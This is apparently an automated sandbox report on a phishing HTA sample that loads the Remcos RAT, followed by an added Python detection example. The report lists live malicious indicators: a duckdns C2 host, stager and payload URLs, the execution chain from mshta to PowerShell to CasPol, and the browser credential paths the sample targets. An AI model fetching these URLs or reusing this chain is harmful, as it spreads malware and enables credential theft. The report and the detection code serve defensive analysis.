                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00404915 GetLocalTime,CreateEventA,CreateThread,12_2_00404915
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041A7A2 GetComputerNameExW,GetUserNameW,12_2_0041A7A2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0044800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,12_2_0044800F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

Source: Yara match | File source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.powershell.exe.6724510.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.powershell.exe.6724510.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.2487827556.0000000006683000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.4555889759.0000000001468000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5924, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 1776, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data | 12_2_0040B21B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ | 12_2_0040B335
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: \key3.db | 12_2_0040B335

                      Remote Access Functionality

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-H22KKM
Source: Yara match | File source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.powershell.exe.6724510.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.powershell.exe.6724510.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.2487827556.0000000006683000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.4555889759.0000000001468000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5924, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 1776, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: cmd.exe | 12_2_00405042
MITRE ATT&CK Matrix (numbers before a technique name are the signature counts shown in the report)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 111 Scripting | Valid Accounts | 1 Native API | 111 Scripting | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 1 Bypass User Account Control | 2 Obfuscated Files or Information | 111 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Email Collection | 12 Ingress Tool Transfer | Exfiltration Over Bluetooth | 1 Defacement
Email Addresses | DNS Server | Domain Accounts | 13 Command and Scripting Interpreter | 1 Windows Service | 1 Access Token Manipulation | 1 DLL Side-Loading | 2 Credentials In Files | 1 System Service Discovery | SMB/Windows Admin Shares | 111 Input Capture | 21 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 2 Service Execution | Login Hook | 1 Windows Service | 1 Bypass User Account Control | NTDS | 3 File and Directory Discovery | Distributed Component Object Model | 3 Clipboard Data | 1 Remote Access Software | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | 3 PowerShell | Network Logon Script | 221 Process Injection | 1 Masquerading | LSA Secrets | 34 System Information Discovery | SSH | Keylogging | 2 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 21 Virtualization/Sandbox Evasion | Cached Domain Credentials | 21 Security Software Discovery | VNC | GUI Input Capture | 213 Application Layer Protocol | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Access Token Manipulation | DCSync | 21 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 221 Process Injection | Proc Filesystem | 2 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
Behavior Graph ID: 1576455 (the graph image rendered as a process tree)
Sample: seethebestmethodwithgreatne... (truncated in the graph)   Start date: 17/12/2024   Architecture: WINDOWS   Score: 100

Sample-level network nodes: kiolokgangan.duckdns.org (Uses dynamic DNS services); paste.ee (Connects to a pastebin service (likely for C&C)); 2 other IPs or domains
Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 17 other signatures

mshta.exe
  signatures: Suspicious command line found; PowerShell case anomaly found
  └─ cmd.exe
       signatures: Detected Cobalt Strike Beacon; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); PowerShell case anomaly found
       ├─ conhost.exe
       └─ powershell.exe
            network: 74.208.80.248:80 (local port 49707), ONEANDONE-AS Brauerstrasse 48 DE, geolocated United States
            dropped: seewhatiamdoingfor...sthingsgivenmeb.vbS (Unicode); C:\Users\user\AppData\...\bxb5o0my.cmdline (Unicode)
            signatures: Loading BitLocker PowerShell Module
            ├─ csc.exe
            │    dropped: C:\Users\user\AppData\Local\...\bxb5o0my.dll (PE32)
            │    └─ cvtres.exe
            └─ wscript.exe
                 signatures: Detected Cobalt Strike Beacon; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 2 other signatures
                 └─ powershell.exe
                      network: cloudinary.map.fastly.net 151.101.1.137:443 (local port 49715; FASTLYUS, United States); paste.ee 104.21.84.67:443 (local port 49770; CLOUDFLARENETUS, United States)
                      signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes
                      ├─ conhost.exe
                      └─ CasPol.exe
                           network: kiolokgangan.duckdns.org 192.169.69.26:2430 (local ports 49781, 49808; WOWUS, United States)
                           signatures: Contains functionality to bypass UAC (CMSTPLUA); Detected Remcos RAT; Contains functionalty to change the wallpaper; 4 other signatures
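The chain the graph shows (mshta.exe -> cmd.exe -> powershell.exe -> wscript.exe -> powershell.exe -> CasPol.exe, with a stager fetched from a bare IP, a paste.ee fetch and a Remcos C2 on a duckdns host over port 2430) is exactly the kind of pattern an analyst turns into detection logic. The following is an added example and not code from the Joe Sandbox report or from the sample: it runs three checks over constructed process-creation and network-connection events modelled on the tree above. Only PID 3608 (mshta.exe) comes from the report; the other PIDs, every command line, and the event layout are placeholders, and conhost.exe/cvtres.exe are left out of the constructed data.

```python
"""Added example (not from the Joe Sandbox report or the sample): detection checks over constructed telemetry."""
from dataclasses import dataclass

# Indicators copied from the report's network tables and behavior graph.
C2_DOMAIN = "kiolokgangan.duckdns.org"
C2_PORT = 2430
DYNAMIC_DNS_SUFFIXES = (".duckdns.org",)  # report signature: "Uses dynamic DNS services"
PASTEBIN_HOSTS = {"paste.ee"}             # report signature: "Connects to a pastebin service"
EXPECTED_PORTS = {80, 443}
# Parent -> child pairs taken from this report's process tree; each is rare for
# a benign mshta.exe launch and cheap to alert on.
SUSPICIOUS_PAIRS = {
    ("mshta.exe", "cmd.exe"), ("cmd.exe", "powershell.exe"),
    ("powershell.exe", "wscript.exe"), ("wscript.exe", "powershell.exe"),
    ("powershell.exe", "csc.exe"), ("powershell.exe", "caspol.exe"),
}
CANONICAL_POWERSHELL = {"powershell", "Powershell", "PowerShell", "POWERSHELL"}

@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # image basename as logged, e.g. "mshta.exe"
    cmdline: str

@dataclass
class NetEvent:
    pid: int
    dest_host: str  # "" when only an IP literal was contacted
    dest_ip: str
    dest_port: int

# Constructed telemetry. Only PID 3608 (mshta.exe) appears in the report; the
# other PIDs and every command line are placeholders.
PROC_EVENTS = [
    ProcEvent(3608, 900,  "mshta.exe",      "mshta.exe <constructed .hta path>"),
    ProcEvent(4100, 3608, "cmd.exe",        "cmd.exe /c pOwErShElL -w hidden -enc <constructed>"),
    ProcEvent(4200, 4100, "powershell.exe", "pOwErShElL -w hidden -enc <constructed>"),
    ProcEvent(4300, 4200, "wscript.exe",    "wscript.exe <constructed .vbS path>"),
    ProcEvent(4310, 4200, "csc.exe",        "csc.exe /noconfig @<constructed>.cmdline"),
    ProcEvent(4400, 4300, "powershell.exe", "powershell.exe -enc <constructed>"),
    ProcEvent(4500, 4400, "CasPol.exe",     "CasPol.exe"),
]
NET_EVENTS = [
    NetEvent(4200, "", "74.208.80.248", 80),                            # stager fetch from a bare IP
    NetEvent(4400, "cloudinary.map.fastly.net", "151.101.1.137", 443),
    NetEvent(4400, "paste.ee", "104.21.84.67", 443),
    NetEvent(4500, C2_DOMAIN, "192.169.69.26", C2_PORT),                # Remcos C2
]

def ancestry(pid, events):
    """Image chain from the outermost known ancestor down to pid, lower-cased."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:  # stop at unknown or cyclic PIDs
        seen.add(pid)
        chain.append(by_pid[pid].image.lower())
        pid = by_pid[pid].ppid
    return chain[::-1]

def suspicious_pairs(events):
    """(parent, child, child_pid) for each event whose parent/child pair is listed."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent and (parent.image.lower(), e.image.lower()) in SUSPICIOUS_PAIRS:
            hits.append((parent.image.lower(), e.image.lower(), e.pid))
    return hits

def powershell_case_anomaly(cmdline):
    """True if 'powershell' is spelled in odd mixed case (the report's 'PowerShell case anomaly')."""
    for tok in cmdline.split():
        name = tok.rsplit("\\", 1)[-1]          # drop any directory prefix
        if name.lower().endswith(".exe"):
            name = name[:-4]
        if name.lower() == "powershell" and name not in CANONICAL_POWERSHELL:
            return True
    return False

def network_tags(ev):
    """Tags for one connection, in fixed order."""
    host = ev.dest_host.lower()
    checks = [
        ("ip-literal", not host),
        ("dynamic-dns", host.endswith(DYNAMIC_DNS_SUFFIXES)),
        ("pastebin-service", host in PASTEBIN_HOSTS),
        ("non-standard-port", ev.dest_port not in EXPECTED_PORTS),
    ]
    return [tag for tag, hit in checks if hit]

def analyse(procs, nets):
    """Findings keyed by PID, combining the three checks above."""
    findings = {}
    for e in procs:
        if powershell_case_anomaly(e.cmdline):
            findings.setdefault(e.pid, []).append("powershell-case-anomaly")
    for parent, child, pid in suspicious_pairs(procs):
        findings.setdefault(pid, []).append(f"suspicious-parent:{parent}->{child}")
    for n in nets:
        for tag in network_tags(n):
            findings.setdefault(n.pid, []).append(f"net:{tag}")
    return findings

if __name__ == "__main__":
    for pid, tags in sorted(analyse(PROC_EVENTS, NET_EVENTS).items()):
        print(pid, " -> ".join(ancestry(pid, PROC_EVENTS)), tags)
```

Each finding is attached to the child PID, so `ancestry()` reconstructs the full chain for any flagged process; in real telemetry (Sysmon event 1 / 3, or EDR process and network events) the same three checks apply once the fields are mapped onto `ProcEvent` and `NetEvent`. The host-based tests are the robust part: the IP, port and domain are campaign-specific and rotate, while the parent/child sequence and the mixed-case PowerShell invocation are what the sample cannot easily avoid.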

Antivirus detection: sample

Source | Detection | Scanner | Label
seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta | 28% | Virustotal |
seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta | 13% | ReversingLabs | Script-JS.Phishing.Generic

No Antivirus matches (the report's three further AV tables are empty)

Antivirus detection: URLs

Source | Detection | Scanner | Label
https://analytics.paste.ee | 0% | Avira URL Cloud | safe
http://74.208.80.248/43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIFo | 0% | Avira URL Cloud | safe
https://www.google.com; | 0% | Avira URL Cloud | safe
kiolokgangan.duckdns.org | 100% | Avira URL Cloud | malware
https://analytics.paste.ee; | 0% | Avira URL Cloud | safe
http://74.208.80.248/43/seewhati | 0% | Avira URL Cloud | safe
http://74.208.80.248/43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIFity | 0% | Avira URL Cloud | safe
http://74.208.80.248/43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIFM | 0% | Avira URL Cloud | safe
http://74.208.80.248/43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIF | 0% | Avira URL Cloud | safe
http://74.208.80.248/43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIFtM | 0% | Avira URL Cloud | safe
https://cdnjs.cloudflare.com; | 0% | Avira URL Cloud | safe
http://74.208.80.248/43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIFY | 0% | Avira URL Cloud | safe
https://akaStorageSetting.cdxml | 0% | Avira URL Cloud | safe
http://74.208.80.248/43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIFc | 0% | Avira URL Cloud | safe
Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
paste.ee | 104.21.84.67 | true | false | | high
cloudinary.map.fastly.net | 151.101.1.137 | true | false | | high
kiolokgangan.duckdns.org | 192.169.69.26 | true | true | | unknown
res.cloudinary.com | unknown | unknown | false | | high
URLs contacted

Name | Malicious | Antivirus Detection | Reputation
kiolokgangan.duckdns.org | true | Avira URL Cloud: malware | unknown
http://74.208.80.248/43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIF | true | Avira URL Cloud: safe | unknown
https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg | false | | high
https://paste.ee/r/3tNKn/0 | false | | high
URLs found in memory and binary data

Name | Source | Malicious | Antivirus Detection | Reputation
http://74.208.80.248/43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIFtM | powershell.exe, 00000003.00000002.2233063416.000000000708D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000003.00000002.2231208292.00000000058D9000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000003.00000002.2229203641.00000000049C7000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://74.208.80.248/43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIFM | powershell.exe, 00000003.00000002.2233063416.0000000007145000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000003.00000002.2229203641.00000000049C7000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.microsoft | powershell.exe, 00000003.00000002.2235184005.0000000007FDA000.00000004.00000020.00020000.00000000.sdmp | false | | high
